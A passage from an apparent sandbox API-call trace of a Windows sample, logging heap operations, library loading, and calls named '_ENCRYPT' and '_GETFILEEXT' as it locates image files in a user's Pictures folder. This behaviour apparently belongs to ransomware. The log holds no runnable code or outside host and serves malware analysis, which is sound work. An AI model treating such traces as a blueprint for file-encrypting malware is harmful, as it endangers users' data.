dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0190.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0190.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.293] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0190.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0190.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0190.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0190.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.295] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0190.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0190.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0190.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0190.296] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0190.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0190.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0190.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.297] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.297] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0190.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bdb10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0190.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.298] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0190.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0190.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.298] CloseHandle (hObject=0x160) returned 1 [0190.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0190.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0190.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0190.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.299] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.300] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0190.300] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0190.300] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0190.300] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.300] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0190.300] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.301] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0190.301] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.301] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.301] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9489db00, ftCreationTime.dwHighDateTime=0x1d5df5e, ftLastAccessTime.dwLowDateTime=0x82a6dc10, ftLastAccessTime.dwHighDateTime=0x1d5dc77, ftLastWriteTime.dwLowDateTime=0x82a6dc10, ftLastWriteTime.dwHighDateTime=0x1d5dc77, nFileSizeHigh=0x0, nFileSizeLow=0xa046, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="x6Gb.png", cAlternateFileName="")) returned 0x90add8 [0190.301] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.301] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.301] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9489db00, ftCreationTime.dwHighDateTime=0x1d5df5e, ftLastAccessTime.dwLowDateTime=0x82a6dc10, ftLastAccessTime.dwHighDateTime=0x1d5dc77, ftLastWriteTime.dwLowDateTime=0x82a6dc10, ftLastWriteTime.dwHighDateTime=0x1d5dc77, nFileSizeHigh=0x0, nFileSizeLow=0xa046, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="x6Gb.png", cAlternateFileName="")) returned 0x90add8 [0190.302] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.302] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png\"", 